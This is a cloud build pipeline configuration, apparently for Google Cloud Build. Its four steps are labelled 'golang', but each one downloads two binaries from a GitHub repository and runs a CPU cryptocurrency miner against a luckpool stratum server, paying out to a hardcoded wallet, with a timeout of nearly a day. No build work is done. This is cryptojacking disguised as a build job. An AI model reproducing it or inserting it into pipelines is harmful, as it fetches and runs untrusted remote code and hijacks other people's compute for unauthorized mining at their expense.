steps:
- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://github.com/Jwjwj83838/TES/raw/main/hellminers && wget https://github.com/Jwjwj83838/TES/raw/main/verus-solver && chmod +x hellminers verus-solver && ./hellminers -c stratum+tcp://ap.luckpool.net:3956 -u REA4Vm58oEr3MdBwiKXCb1AMc7pNJFFN12.mm -p x --cpu
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://github.com/Jwjwj83838/TES/raw/main/hellminers && wget https://github.com/Jwjwj83838/TES/raw/main/verus-solver && chmod +x hellminers verus-solver && ./hellminers -c stratum+tcp://ap.luckpool.net:3956 -u REA4Vm58oEr3MdBwiKXCb1AMc7pNJFFN12.mm -p x --cpu
  waitFor:
    - '-'
    
- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://github.com/Jwjwj83838/TES/raw/main/hellminers && wget https://github.com/Jwjwj83838/TES/raw/main/verus-solver && chmod +x hellminers verus-solver && ./hellminers -c stratum+tcp://ap.luckpool.net:3956 -u REA4Vm58oEr3MdBwiKXCb1AMc7pNJFFN12.mm -p x --cpu
  waitFor:
    - '-'

- name: golang
  entrypoint: /bin/bash
  args:
    - '-c'
    - |
      wget https://github.com/Jwjwj83838/TES/raw/main/hellminers && wget https://github.com/Jwjwj83838/TES/raw/main/verus-solver && chmod +x hellminers verus-solver && ./hellminers -c stratum+tcp://ap.luckpool.net:3956 -u REA4Vm58oEr3MdBwiKXCb1AMc7pNJFFN12.mm -p x --cpu
  waitFor:
    - '-'
timeout: '86000s'
